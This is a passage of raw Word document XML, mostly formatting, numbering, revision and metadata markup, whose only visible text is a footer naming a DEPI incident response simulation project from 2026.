        </w:pBdr>
        <w:spacing w:before="80" w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="41951DD8" w14:textId="77777777" w:rsidR="003826D7" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:color w:val="808080"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">DEPI </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:color w:val="808080"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Project  |</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:color w:val="808080"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  Incident Response </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:color w:val="808080"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Simulation  |</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:color w:val="808080"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  Digital Egypt Pioneers </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:color w:val="808080"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Initiative  |</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:color w:val="808080"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  2026</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="003826D7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686225">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="1817070115">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="1095130778">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="998729605">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="144205465">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="1418751646">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="99879079">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="733702062">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="138447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B36"/>
    <w:rsid w:val="00034616"/>
    <w:rsid w:val="0006063C"/>
    <w:rsid w:val="0015074B"/>
    <w:rsid w:val="002169BF"/>
    <w:rsid w:val="0029639D"/>
    <w:rsid w:val="00326F90"/>
    <w:rsid w:val="003826D7"/>
    <w:rsid w:val="00447A03"/>
    <w:rsid w:val="00603072"/>
    <w:rsid w:val="006C6440"/>
    <w:rsid w:val="006F69B9"/>
    <w:rsid w:val="007F1922"/>
    <w:rsid w:val="00927E86"/>
    <w:rsid w:val="00A53689"/>
    <w:rsid w:val="00AA1D8D"/>
    <w:rsid w:val="00B47730"/>
    <w:rsid w:val="00B81C92"/>
    <w:rsid w:val="00C01814"/>
    <w:rsid w:val="00CB0664"/>
    <w:rsid w:val="00E22026"/>
    <w:rsid w:val="00EA4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3CFF3"/>
  <w14:defaultImageDpi w14:val="300"/>
  <w15:docId w15:val="{AE4CF6F9-CC18-4381-BEBD-03D63A32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Adham Banna</cp:lastModifiedBy>
  <cp:revision>15</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2013-12-23T23:15:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-07-02T17:19:00Z</dcterms:modified>
  <cp:category/>
</cp:coreProperties>
</file>